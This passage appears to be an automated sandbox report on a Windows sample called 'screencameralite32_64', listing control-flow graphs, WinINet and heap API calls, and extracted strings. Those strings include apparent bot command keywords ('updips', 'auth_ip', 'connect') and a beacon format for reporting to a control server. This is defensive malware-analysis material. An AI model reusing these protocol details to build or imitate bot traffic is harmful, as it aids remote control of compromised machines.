19627 2c82eec _malloc 59 API calls 19623->19627 19630 2c8d972 19623->19630 19624->19615 19625 2c8f628 __crtLCMapStringA_stat LCMapStringW 19626 2c8d9b5 19625->19626 19628 2c8d9dd 19626->19628 19631 2c8d9cf WideCharToMultiByte 19626->19631 19627->19630 19629 2c8da47 __freea 59 API calls 19628->19629 19629->19615 19630->19615 19630->19625 19631->19628 19632->19573 19634 2c86c15 19633->19634 19635 2c86c07 19633->19635 19636 2c85d9b __wctomb_s_l 59 API calls 19634->19636 19635->19634 19638 2c86c2b 19635->19638 19641 2c86c1c 19636->19641 19637 2c84e35 __wctomb_s_l 9 API calls 19639 2c86c26 19637->19639 19638->19639 19640 2c85d9b __wctomb_s_l 59 API calls 19638->19640 19639->19376 19640->19641 19641->19637 19643 2c8d222 RtlEncodePointer 19642->19643 19643->19643 19644 2c8d23c 19643->19644 19644->19390 19646 2c890ff 19645->19646 19647 2c89103 TlsFree 19645->19647 19646->19394 19647->19394 19649 2c85a3b ___BuildCatchObject 19648->19649 19650 2c85a54 19649->19650 19651 2c82eb4 _free 59 API calls 19649->19651 19653 2c85b43 ___BuildCatchObject 19649->19653 19652 2c85a63 19650->19652 19654 2c82eb4 _free 59 API calls 19650->19654 19651->19650 19655 2c82eb4 _free 59 API calls 19652->19655 19657 2c85a72 19652->19657 19653->19445 19654->19652 19655->19657 19656 2c85a81 19659 2c85a90 19656->19659 19660 2c82eb4 _free 59 API calls 19656->19660 19657->19656 19658 2c82eb4 _free 59 API calls 19657->19658 19658->19656 19661 2c85a9f 19659->19661 19662 2c82eb4 _free 59 API calls 19659->19662 19660->19659 19663 2c85aae 19661->19663 19664 2c82eb4 _free 59 API calls 19661->19664 19662->19661 19665 2c85ac0 19663->19665 19666 2c82eb4 _free 59 API calls 19663->19666 19664->19663 19667 2c8882d __lock 59 API calls 19665->19667 19666->19665 19670 2c85ac8 19667->19670 19668 2c85aeb 19680 2c85b4f 19668->19680 19670->19668 19672 2c82eb4 _free 59 API calls 19670->19672 19672->19668 19673 2c8882d __lock 59 API calls 19678 2c85aff ___removelocaleref 19673->19678 19674 2c85b30 19713 2c85b5b 19674->19713 19677 2c82eb4 _free 59 API calls 19677->19653 19678->19674 19683 2c84f05 19678->19683 19716 2c88997 RtlLeaveCriticalSection 19680->19716 19682 2c85af8 19682->19673 19684 2c84f7e 19683->19684 19685 2c84f1a 19683->19685 19686 2c84fcb 19684->19686 19687 2c82eb4 _free 59 API calls 19684->19687 19685->19684 19695 2c84f4b 19685->19695 19697 2c82eb4 _free 59 API calls 19685->19697 19693 2c84ff4 19686->19693 19757 2c8d47d 19686->19757 19688 2c84f9f 19687->19688 19690 2c82eb4 _free 59 API calls 19688->19690 19694 2c84fb2 19690->19694 19692 2c85053 19699 2c82eb4 _free 59 API calls 19692->19699 19693->19692 19709 2c82eb4 59 API calls _free 19693->19709 19700 2c82eb4 _free 59 API calls 19694->19700 19701 2c82eb4 _free 59 API calls 19695->19701 19712 2c84f69 19695->19712 19696 2c82eb4 _free 59 API calls 19702 2c84f73 19696->19702 19703 2c84f40 19697->19703 19698 2c82eb4 _free 59 API calls 19698->19693 19704 2c85059 19699->19704 19705 2c84fc0 19700->19705 19706 2c84f5e 19701->19706 19707 2c82eb4 _free 59 API calls 19702->19707 19717 2c8d31a 19703->19717 19704->19674 19710 2c82eb4 _free 59 API calls 19705->19710 19745 2c8d416 19706->19745 19707->19684 19709->19693 19710->19686 19712->19696 19933 2c88997 RtlLeaveCriticalSection 19713->19933 19715 2c85b3d 19715->19677 19716->19682 19718 2c8d329 19717->19718 19744 2c8d412 19717->19744 19719 2c82eb4 _free 59 API calls 19718->19719 19721 2c8d33a 19718->19721 19719->19721 19720 2c8d34c 19723 2c8d35e 19720->19723 19724 2c82eb4 _free 59 API calls 19720->19724 19721->19720 19722 2c82eb4 _free 59 API calls 19721->19722 19722->19720 19725 2c8d370 19723->19725 19727 2c82eb4 _free 59 API calls 19723->19727 19724->19723 19726 2c8d382 19725->19726 19728 2c82eb4 _free 59 API calls 19725->19728 19729 2c8d394 19726->19729 19730 2c82eb4 _free 59 API calls 19726->19730 19727->19725 19728->19726 19731 2c8d3a6 19729->19731 19732 2c82eb4 _free 59 API calls 19729->19732 19730->19729 19733 2c8d3b8 19731->19733 19735 2c82eb4 _free 59 API calls 19731->19735 19732->19731 19734 2c8d3ca 19733->19734 19736 2c82eb4 _free 59 API calls 19733->19736 19737 2c8d3dc 19734->19737 19738 2c82eb4 _free 59 API calls 19734->19738 19735->19733 19736->19734 19739 2c8d3ee 19737->19739 19740 2c82eb4 _free 59 API calls 19737->19740 19738->19737 19741 2c8d400 19739->19741 19742 2c82eb4 _free 59 API calls 19739->19742 19740->19739 19743 2c82eb4 _free 59 API calls 19741->19743 19741->19744 19742->19741 19743->19744 19744->19695 19746 2c8d421 19745->19746 19756 2c8d479 19745->19756 19747 2c82eb4 _free 59 API calls 19746->19747 19751 2c8d431 19746->19751 19747->19751 19748 2c82eb4 _free 59 API calls 19749 2c8d443 19748->19749 19750 2c8d455 19749->19750 19752 2c82eb4 _free 59 API calls 19749->19752 19753 2c8d467 19750->19753 19754 2c82eb4 _free 59 API calls 19750->19754 19751->19748 19751->19749 19752->19750 19755 2c82eb4 _free 59 API calls 19753->19755 19753->19756 19754->19753 19755->19756 19756->19712 19758 2c84fe9 19757->19758 19759 2c8d48c 19757->19759 19758->19698 19760 2c82eb4 _free 59 API calls 19759->19760 19761 2c8d494 19760->19761 19762 2c82eb4 _free 59 API calls 19761->19762 19763 2c8d49c 19762->19763 19764 2c82eb4 _free 59 API calls 19763->19764 19765 2c8d4a4 19764->19765 19766 2c82eb4 _free 59 API calls 19765->19766 19767 2c8d4ac 19766->19767 19768 2c82eb4 _free 59 API calls 19767->19768 19769 2c8d4b4 19768->19769 19770 2c82eb4 _free 59 API calls 19769->19770 19771 2c8d4bc 19770->19771 19772 2c82eb4 _free 59 API calls 19771->19772 19773 2c8d4c3 19772->19773 19774 2c82eb4 _free 59 API calls 19773->19774 19775 2c8d4cb 19774->19775 19776 2c82eb4 _free 59 API calls 19775->19776 19777 2c8d4d3 19776->19777 19778 2c82eb4 _free 59 API calls 19777->19778 19779 2c8d4db 19778->19779 19780 2c82eb4 _free 59 API calls 19779->19780 19781 2c8d4e3 19780->19781 19782 2c82eb4 _free 59 API calls 19781->19782 19783 2c8d4eb 19782->19783 19784 2c82eb4 _free 59 API calls 19783->19784 19785 2c8d4f3 19784->19785 19786 2c82eb4 _free 59 API calls 19785->19786 19787 2c8d4fb 19786->19787 19788 2c82eb4 _free 59 API calls 19787->19788 19789 2c8d503 19788->19789 19790 2c82eb4 _free 59 API calls 19789->19790 19791 2c8d50b 19790->19791 19792 2c82eb4 _free 59 API calls 19791->19792 19793 2c8d516 19792->19793 19794 2c82eb4 _free 59 API calls 19793->19794 19795 2c8d51e 19794->19795 19796 2c82eb4 _free 59 API calls 19795->19796 19797 2c8d526 19796->19797 19798 2c82eb4 _free 59 API calls 19797->19798 19799 2c8d52e 19798->19799 19800 2c82eb4 _free 59 API calls 19799->19800 19801 2c8d536 19800->19801 19802 2c82eb4 _free 59 API calls 19801->19802 19803 2c8d53e 19802->19803 19804 2c82eb4 _free 59 API calls 19803->19804 19805 2c8d546 19804->19805 19806 2c82eb4 _free 59 API calls 19805->19806 19807 2c8d54e 19806->19807 19808 2c82eb4 _free 59 API calls 19807->19808 19809 2c8d556 19808->19809 19810 2c82eb4 _free 59 API calls 19809->19810 19811 2c8d55e 19810->19811 19812 2c82eb4 _free 59 API calls 19811->19812 19813 2c8d566 19812->19813 19814 2c82eb4 _free 59 API calls 19813->19814 19815 2c8d56e 19814->19815 19816 2c82eb4 _free 59 API calls 19815->19816 19817 2c8d576 19816->19817 19818 2c82eb4 _free 59 API calls 19817->19818 19819 2c8d57e 19818->19819 19820 2c82eb4 _free 59 API calls 19819->19820 19821 2c8d586 19820->19821 19822 2c82eb4 _free 59 API calls 19821->19822 19823 2c8d58e 19822->19823 19824 2c82eb4 _free 59 API calls 19823->19824 19825 2c8d59c 19824->19825 19826 2c82eb4 _free 59 API calls 19825->19826 19827 2c8d5a7 19826->19827 19828 2c82eb4 _free 59 API calls 19827->19828 19829 2c8d5b2 19828->19829 19830 2c82eb4 _free 59 API calls 19829->19830 19831 2c8d5bd 19830->19831 19832 2c82eb4 _free 59 API calls 19831->19832 19833 2c8d5c8 19832->19833 19834 2c82eb4 _free 59 API calls 19833->19834 19835 2c8d5d3 19834->19835 19836 2c82eb4 _free 59 API calls 19835->19836 19837 2c8d5de 19836->19837 19838 2c82eb4 _free 59 API calls 19837->19838 19839 2c8d5e9 19838->19839 19840 2c82eb4 _free 59 API calls 19839->19840 19841 2c8d5f4 19840->19841 19842 2c82eb4 _free 59 API calls 19841->19842 19843 2c8d5ff 19842->19843 19844 2c82eb4 _free 59 API calls 19843->19844 19845 2c8d60a 19844->19845 19846 2c82eb4 _free 59 API calls 19845->19846 19847 2c8d615 19846->19847 19848 2c82eb4 _free 59 API calls 19847->19848 19849 2c8d620 19848->19849 19850 2c82eb4 _free 59 API calls 19849->19850 19851 2c8d62b 19850->19851 19852 2c82eb4 _free 59 API calls 19851->19852 19853 2c8d636 19852->19853 19854 2c82eb4 _free 59 API calls 19853->19854 19855 2c8d641 19854->19855 19856 2c82eb4 _free 59 API calls 19855->19856 19857 2c8d64f 19856->19857 19858 2c82eb4 _free 59 API calls 19857->19858 19859 2c8d65a 19858->19859 19860 2c82eb4 _free 59 API calls 19859->19860 19861 2c8d665 19860->19861 19862 2c82eb4 _free 59 API calls 19861->19862 19863 2c8d670 19862->19863 19864 2c82eb4 _free 59 API calls 19863->19864 19865 2c8d67b 19864->19865 19866 2c82eb4 _free 59 API calls 19865->19866 19867 2c8d686 19866->19867 19868 2c82eb4 _free 59 API calls 19867->19868 19869 2c8d691 19868->19869 19870 2c82eb4 _free 59 API calls 19869->19870 19871 2c8d69c 19870->19871 19872 2c82eb4 _free 59 API calls 19871->19872 19873 2c8d6a7 19872->19873 19874 2c82eb4 _free 59 API calls 19873->19874 19875 2c8d6b2 19874->19875 19876 2c82eb4 _free 59 API calls 19875->19876 19877 2c8d6bd 19876->19877 19878 2c82eb4 _free 59 API calls 19877->19878 19879 2c8d6c8 19878->19879 19880 2c82eb4 _free 59 API calls 19879->19880 19881 2c8d6d3 19880->19881 19882 2c82eb4 _free 59 API calls 19881->19882 19883 2c8d6de 19882->19883 19884 2c82eb4 _free 59 API calls 19883->19884 19885 2c8d6e9 19884->19885 19886 2c82eb4 _free 59 API calls 19885->19886 19887 2c8d6f4 19886->19887 19888 2c82eb4 _free 59 API calls 19887->19888 19889 2c8d702 19888->19889 19890 2c82eb4 _free 59 API calls 19889->19890 19891 2c8d70d 19890->19891 19892 2c82eb4 _free 59 API calls 19891->19892 19893 2c8d718 19892->19893 19894 2c82eb4 _free 59 API calls 19893->19894 19895 2c8d723 19894->19895 19896 2c82eb4 _free 59 API calls 19895->19896 19897 2c8d72e 19896->19897 19898 2c82eb4 _free 59 API calls 19897->19898 19899 2c8d739 19898->19899 19900 2c82eb4 _free 59 API calls 19899->19900 19901 2c8d744 19900->19901 19902 2c82eb4 _free 59 API calls 19901->19902 19903 2c8d74f 19902->19903 19904 2c82eb4 _free 59 API calls 19903->19904 19905 2c8d75a 19904->19905 19906 2c82eb4 _free 59 API calls 19905->19906 19907 2c8d765 19906->19907 19908 2c82eb4 _free 59 API calls 19907->19908 19909 2c8d770 19908->19909 19910 2c82eb4 _free 59 API calls 19909->19910 19911 2c8d77b 19910->19911 19912 2c82eb4 _free 59 API calls 19911->19912 19913 2c8d786 19912->19913 19914 2c82eb4 _free 59 API calls 19913->19914 19915 2c8d791 19914->19915 19916 2c82eb4 _free 59 API calls 19915->19916 19917 2c8d79c 19916->19917 19918 2c82eb4 _free 59 API calls 19917->19918 19919 2c8d7a7 19918->19919 19920 2c82eb4 _free 59 API calls 19919->19920 19921 2c8d7b5 19920->19921 19922 2c82eb4 _free 59 API calls 19921->19922 19923 2c8d7c0 19922->19923 19924 2c82eb4 _free 59 API calls 19923->19924 19925 2c8d7cb 19924->19925 19926 2c82eb4 _free 59 API calls 19925->19926 19927 2c8d7d6 19926->19927 19928 2c82eb4 _free 59 API calls 19927->19928 19929 2c8d7e1 19928->19929 19930 2c82eb4 _free 59 API calls 19929->19930 19931 2c8d7ec 19930->19931 19932 2c82eb4 _free 59 API calls 19931->19932 19932->19758 19933->19715 18898 2cfc19a 18899 2d0902e CreateFileA 18898->18899 19934 402339 CreateDirectoryA 19935 40288b 19934->19935 18901 2c89692 18902 2c8969f 18901->18902 18903 2c889ac __calloc_crt 59 API calls 18902->18903 18904 2c896b9 18903->18904 18905 2c889ac __calloc_crt 59 API calls 18904->18905 18906 2c896d2 18904->18906 18905->18906 19936 40d0fe RegQueryValueExA 19937 40d091 19936->19937 19938 40d851 19937->19938 19939 40d12b RegCloseKey 19937->19939 19939->19938

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 2c772ab-2c772c3 InternetOpenA 1 2c77389-2c7738f 0->1 2 2c772c9-2c77340 InternetSetOptionA * 3 call 2c84a30 InternetOpenUrlA 0->2 4 2c77391-2c77397 1->4 5 2c773ab-2c773b9 1->5 14 2c77382-2c77383 InternetCloseHandle 2->14 15 2c77342 2->15 9 2c7739d-2c773aa call 2c753ec 4->9 10 2c77399-2c7739b 4->10 6 2c766f4-2c766f6 5->6 7 2c773bf-2c773e3 call 2c84a30 call 2c7439c 5->7 12 2c766ff-2c76701 6->12 13 2c766f8-2c766fd 6->13 7->6 31 2c773e9-2c77417 RtlEnterCriticalSection RtlLeaveCriticalSection call 2c8227c 7->31 9->5 10->5 20 2c76703 12->20 21 2c7670e-2c76742 RtlEnterCriticalSection RtlLeaveCriticalSection 12->21 18 2c76708 Sleep 13->18 14->1 19 2c77346-2c7736c InternetReadFile 15->19 18->21 24 2c77377-2c7737e InternetCloseHandle 19->24 25 2c7736e-2c77375 19->25 20->18 26 2c76744-2c76750 21->26 27 2c76792 21->27 24->14 25->19 26->27 30 2c76752-2c7675f 26->30 29 2c76796 27->29 29->0 32 2c76767-2c76768 30->32 33 2c76761-2c76765 30->33 38 2c7746d-2c77488 call 2c8227c 31->38 39 2c77419-2c7742b call 2c8227c 31->39 34 2c7676c-2c76790 call 2c84a30 * 2 32->34 33->34 34->29 47 2c77742-2c77754 call 2c8227c 38->47 48 2c7748e-2c77490 38->48 39->38 49 2c7742d-2c7743f call 2c8227c 39->49 56 2c77756-2c77758 47->56 57 2c7779d-2c777af call 2c8227c 47->57 48->47 51 2c77496-2c77548 call 2c82eec RtlEnterCriticalSection RtlLeaveCriticalSection call 2c84a30 * 5 call 2c7439c * 2 48->51 49->38 59 2c77441-2c77453 call 2c8227c 49->59 115 2c77585 51->115 116 2c7754a-2c7754c 51->116 56->57 62 2c7775a-2c77798 call 2c84a30 RtlEnterCriticalSection RtlLeaveCriticalSection 56->62 68 2c777b1-2c777cb call 2c761f5 call 2c76303 call 2c7640e 57->68 69 2c777d0-2c777e2 call 2c8227c 57->69 59->38 70 2c77455-2c77467 call 2c8227c 59->70 62->6 68->6 83 2c77b00-2c77b12 call 2c8227c 69->83 84 2c777e8-2c777ea 69->84 70->6 70->38 83->6 95 2c77b18-2c77b46 call 2c82eec call 2c84a30 call 2c7439c 83->95 84->83 88 2c777f0-2c77807 call 2c7439c 84->88 88->6 97 2c7780d-2c778db call 2c82358 call 2c71ba7 88->97 117 2c77b4f-2c77b56 call 2c82eb4 95->117 118 2c77b48-2c77b4a call 2c7534d 95->118 113 2c778e2-2c77903 RtlEnterCriticalSection 97->113 114 2c778dd call 2c7143f 97->114 121 2c77905-2c7790c 113->121 122 2c7790f-2c77973 RtlLeaveCriticalSection call 2c73c67 call 2c73d7e call 2c7826e 113->122 114->113 119 2c77589-2c775b7 call 2c82eec call 2c84a30 call 2c7439c 115->119 116->115 123 2c7754e-2c77560 call 2c8227c 116->123 117->6 118->117 146 2c775b9-2c775c8 call 2c83529 119->146 147 2c775f8-2c77601 call 2c82eb4 119->147 121->122 144 2c77ae7-2c77afb call 2c78f36 122->144 145 2c77979-2c779c1 call 2c7a658 122->145 123->115 135 2c77562-2c77583 call 2c7439c 123->135 135->119 144->6 156 2c779c7-2c779ce 145->156 157 2c77ab1-2c77ae2 call 2c7831d call 2c733b2 145->157 146->147 160 2c775ca 146->160 158 2c77607-2c7761f call 2c83a8f 147->158 159 2c77738-2c7773b 147->159 162 2c779d1-2c779d6 156->162 157->144 171 2c77621-2c77629 call 2c7966a 158->171 172 2c7762b 158->172 159->47 164 2c775cf-2c775e1 call 2c82790 160->164 162->162 166 2c779d8-2c77a23 call 2c7a658 162->166 174 2c775e6-2c775f6 call 2c83529 164->174 175 2c775e3 164->175 166->157 180 2c77a29-2c77a2f 166->180 178 2c7762d-2c776e5 call 2c7a782 call 2c73863 call 2c75119 call 2c73863 call 2c7aa28 call 2c7ab42 171->178 172->178 174->147 174->164 175->174 202 2c776e7 call 2c7380b 178->202 203 2c776ec-2c77717 Sleep call 2c81830 178->203 185 2c77a32-2c77a37 180->185 185->185 187 2c77a39-2c77a74 call 2c7a658 185->187 187->157 193 2c77a76-2c77ab0 call 2c7d04a 187->193 193->157 202->203 207 2c77723-2c77731 203->207 208 2c77719-2c77722 call 2c74100 203->208 207->159 210 2c77733 call 2c7380b 207->210 208->207 210->159
                                                              APIs
                                                              • Sleep.KERNELBASE(0000EA60), ref: 02C76708
                                                              • RtlEnterCriticalSection.NTDLL(02CA71B8), ref: 02C76713
                                                              • RtlLeaveCriticalSection.NTDLL(02CA71B8), ref: 02C76724
                                                              • InternetOpenA.WININET(?), ref: 02C772B5
                                                              • InternetSetOptionA.WININET(00000000,00000002,?), ref: 02C772DD
                                                              • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 02C772F5
                                                              • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02C7730D
                                                              • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200), ref: 02C77336
                                                              • InternetReadFile.WININET(00000000,?,00001000,?), ref: 02C77358
                                                              • InternetCloseHandle.WININET(00000000), ref: 02C77378
                                                              • InternetCloseHandle.WININET(00000000), ref: 02C77383
                                                              • RtlEnterCriticalSection.NTDLL(02CA71B8), ref: 02C773EE
                                                              • RtlLeaveCriticalSection.NTDLL(02CA71B8), ref: 02C773FF
                                                              • _malloc.LIBCMT ref: 02C77498
                                                              • RtlEnterCriticalSection.NTDLL(02CA71B8), ref: 02C774AA
                                                              • RtlLeaveCriticalSection.NTDLL(02CA71B8), ref: 02C774B6
                                                              • _malloc.LIBCMT ref: 02C7758E
                                                              • _strtok.LIBCMT ref: 02C775BF
                                                              • _swscanf.LIBCMT ref: 02C775D6
                                                              • _strtok.LIBCMT ref: 02C775ED
                                                              • _free.LIBCMT ref: 02C775F9
                                                              • Sleep.KERNEL32(000007D0), ref: 02C776F1
                                                              • RtlEnterCriticalSection.NTDLL(02CA71B8), ref: 02C77772
                                                              • RtlLeaveCriticalSection.NTDLL(02CA71B8), ref: 02C77784
                                                              • _sprintf.LIBCMT ref: 02C77822
                                                              • RtlEnterCriticalSection.NTDLL(00000020), ref: 02C778E6
                                                              • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02C7791A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSection$Internet$EnterLeave$Option$CloseHandleOpenSleep_malloc_strtok$FileRead_free_sprintf_swscanf
                                                              • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls$urls
                                                              • API String ID: 1657546717-1839899575
                                                              • Opcode ID: 564eb6cac42aac0b3ebc7992c8e487d9232f398ab47ff3966bca693669846544
                                                              • Instruction ID: f2bc15241a4fc36942677445e53e89b0700d734b3a65fc703c0e33fab6cc7b1e
                                                              • Opcode Fuzzy Hash: 564eb6cac42aac0b3ebc7992c8e487d9232f398ab47ff3966bca693669846544
                                                              • Instruction Fuzzy Hash: 7232E1715483819FE734AB24DC48BAFBBEAAFC6314F10491DF58997290EB709508CB93

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 213 2c7648b-2c766f1 RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress call 2c742c7 GetTickCount call 2c7605a GetVersionExA call 2c84a30 call 2c82eec * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2c84a30 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2c82eec * 4 QueryPerformanceCounter Sleep call 2c82eec * 2 call 2c84a30 * 2 259 2c766f4-2c766f6 213->259 260 2c766ff-2c76701 259->260 261 2c766f8-2c766fd 259->261 263 2c76703 260->263 264 2c7670e-2c76742 RtlEnterCriticalSection RtlLeaveCriticalSection 260->264 262 2c76708 Sleep 261->262 262->264 263->262 265 2c76744-2c76750 264->265 266 2c76792 264->266 265->266 268 2c76752-2c7675f 265->268 267 2c76796-2c772c3 InternetOpenA 266->267 273 2c77389-2c7738f 267->273 274 2c772c9-2c77340 InternetSetOptionA * 3 call 2c84a30 InternetOpenUrlA 267->274 270 2c76767-2c76768 268->270 271 2c76761-2c76765 268->271 272 2c7676c-2c76790 call 2c84a30 * 2 270->272 271->272 272->267 276 2c77391-2c77397 273->276 277 2c773ab-2c773b9 273->277 285 2c77382-2c77383 InternetCloseHandle 274->285 286 2c77342 274->286 281 2c7739d-2c773aa call 2c753ec 276->281 282 2c77399-2c7739b 276->282 277->259 279 2c773bf-2c773e3 call 2c84a30 call 2c7439c 277->279 279->259 297 2c773e9-2c77417 RtlEnterCriticalSection RtlLeaveCriticalSection call 2c8227c 279->297 281->277 282->277 285->273 290 2c77346-2c7736c InternetReadFile 286->290 294 2c77377-2c7737e InternetCloseHandle 290->294 295 2c7736e-2c77375 290->295 294->285 295->290 300 2c7746d-2c77488 call 2c8227c 297->300 301 2c77419-2c7742b call 2c8227c 297->301 306 2c77742-2c77754 call 2c8227c 300->306 307 2c7748e-2c77490 300->307 301->300 308 2c7742d-2c7743f call 2c8227c 301->308 315 2c77756-2c77758 306->315 316 2c7779d-2c777af call 2c8227c 306->316 307->306 310 2c77496-2c77548 call 2c82eec RtlEnterCriticalSection RtlLeaveCriticalSection call 2c84a30 * 5 call 2c7439c * 2 307->310 308->300 318 2c77441-2c77453 call 2c8227c 308->318 374 2c77585 310->374 375 2c7754a-2c7754c 310->375 315->316 321 2c7775a-2c77798 call 2c84a30 RtlEnterCriticalSection RtlLeaveCriticalSection 315->321 327 2c777b1-2c777bf call 2c761f5 call 2c76303 316->327 328 2c777d0-2c777e2 call 2c8227c 316->328 318->300 329 2c77455-2c77467 call 2c8227c 318->329 321->259 345 2c777c4-2c777cb call 2c7640e 327->345 342 2c77b00-2c77b12 call 2c8227c 328->342 343 2c777e8-2c777ea 328->343 329->259 329->300 342->259 354 2c77b18-2c77b46 call 2c82eec call 2c84a30 call 2c7439c 342->354 343->342 347 2c777f0-2c77807 call 2c7439c 343->347 345->259 347->259 356 2c7780d-2c778db call 2c82358 call 2c71ba7 347->356 376 2c77b4f-2c77b56 call 2c82eb4 354->376 377 2c77b48-2c77b4a call 2c7534d 354->377 372 2c778e2-2c77903 RtlEnterCriticalSection 356->372 373 2c778dd call 2c7143f 356->373 380 2c77905-2c7790c 372->380 381 2c7790f-2c77973 RtlLeaveCriticalSection call 2c73c67 call 2c73d7e call 2c7826e 372->381 373->372 378 2c77589-2c775b7 call 2c82eec call 2c84a30 call 2c7439c 374->378 375->374 382 2c7754e-2c77560 call 2c8227c 375->382 376->259 377->376 405 2c775b9-2c775c8 call 2c83529 378->405 406 2c775f8-2c77601 call 2c82eb4 378->406 380->381 403 2c77ae7-2c77afb call 2c78f36 381->403 404 2c77979-2c779c1 call 2c7a658 381->404 382->374 394 2c77562-2c77583 call 2c7439c 382->394 394->378 403->259 415 2c779c7-2c779ce 404->415 416 2c77ab1-2c77ae2 call 2c7831d call 2c733b2 404->416 405->406 419 2c775ca 405->419 417 2c77607-2c7761f call 2c83a8f 406->417 418 2c77738-2c7773b 406->418 421 2c779d1-2c779d6 415->421 416->403 430 2c77621-2c77629 call 2c7966a 417->430 431 2c7762b 417->431 418->306 423 2c775cf-2c775e1 call 2c82790 419->423 421->421 425 2c779d8-2c77a23 call 2c7a658 421->425 433 2c775e6-2c775f6 call 2c83529 423->433 434 2c775e3 423->434 425->416 439 2c77a29-2c77a2f 425->439 437 2c7762d-2c776cf call 2c7a782 call 2c73863 call 2c75119 call 2c73863 call 2c7aa28 call 2c7ab42 430->437 431->437 433->406 433->423 434->433 460 2c776d4-2c776e5 437->460 444 2c77a32-2c77a37 439->444 444->444 446 2c77a39-2c77a74 call 2c7a658 444->446 446->416 452 2c77a76-2c77aaa call 2c7d04a 446->452 456 2c77aaf-2c77ab0 452->456 456->416 461 2c776e7 call 2c7380b 460->461 462 2c776ec-2c77717 Sleep call 2c81830 460->462 461->462 466 2c77723-2c77731 462->466 467 2c77719-2c77722 call 2c74100 462->467 466->418 469 2c77733 call 2c7380b 466->469 467->466 469->418
                                                              APIs
                                                              • RtlInitializeCriticalSection.NTDLL(02CA71B8), ref: 02C764BA
                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02C764D1
                                                              • GetProcAddress.KERNEL32(00000000), ref: 02C764DA
                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02C764E9
                                                              • GetProcAddress.KERNEL32(00000000), ref: 02C764EC
                                                              • GetTickCount.KERNEL32 ref: 02C764F8
                                                                • Part of subcall function 02C7605A: _malloc.LIBCMT ref: 02C76068
                                                              • GetVersionExA.KERNEL32(02CA7010), ref: 02C76525
                                                              • _malloc.LIBCMT ref: 02C76551
                                                                • Part of subcall function 02C82EEC: __FF_MSGBANNER.LIBCMT ref: 02C82F03
                                                                • Part of subcall function 02C82EEC: __NMSG_WRITE.LIBCMT ref: 02C82F0A
                                                                • Part of subcall function 02C82EEC: RtlAllocateHeap.NTDLL(00B60000,00000000,00000001), ref: 02C82F2F
                                                              • _malloc.LIBCMT ref: 02C76561
                                                              • _malloc.LIBCMT ref: 02C7656C
                                                              • _malloc.LIBCMT ref: 02C76577
                                                              • _malloc.LIBCMT ref: 02C76582
                                                              • _malloc.LIBCMT ref: 02C7658D
                                                              • _malloc.LIBCMT ref: 02C76598
                                                              • _malloc.LIBCMT ref: 02C765A7
                                                              • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02C765BE
                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02C765C7
                                                              • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02C765D6
                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02C765D9
                                                              • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02C765E4
                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02C765E7
                                                              • RtlEnterCriticalSection.NTDLL(02CA71B8), ref: 02C76621
                                                              • RtlLeaveCriticalSection.NTDLL(02CA71B8), ref: 02C7662E
                                                              • _malloc.LIBCMT ref: 02C76652
                                                              • _malloc.LIBCMT ref: 02C76660
                                                              • _malloc.LIBCMT ref: 02C76667
                                                              • _malloc.LIBCMT ref: 02C7668D
                                                              • QueryPerformanceCounter.KERNEL32(00000200), ref: 02C766A0
                                                              • Sleep.KERNELBASE ref: 02C766AE
                                                              • _malloc.LIBCMT ref: 02C766BA
                                                              • _malloc.LIBCMT ref: 02C766C7
                                                              • Sleep.KERNELBASE(0000EA60), ref: 02C76708
                                                              • RtlEnterCriticalSection.NTDLL(02CA71B8), ref: 02C76713
                                                              • RtlLeaveCriticalSection.NTDLL(02CA71B8), ref: 02C76724
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _malloc$Heap$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                              • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                              • API String ID: 4273019447-2678694477
                                                              • Opcode ID: 7464766b598e7237ec0c1481632ffc38302fa63965a238761dcf5de2683eefcb
                                                              • Instruction ID: df03f6d0fe9ac1001b75d8d04d6ae6d9461b33f42df789ff826916b21d6e7708
                                                              • Opcode Fuzzy Hash: 7464766b598e7237ec0c1481632ffc38302fa63965a238761dcf5de2683eefcb
                                                              • Instruction Fuzzy Hash: 5771B2B2D543809FE310BF749C49B5FBBE9EF85714F10482AFA8597280EAB45804DF96

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
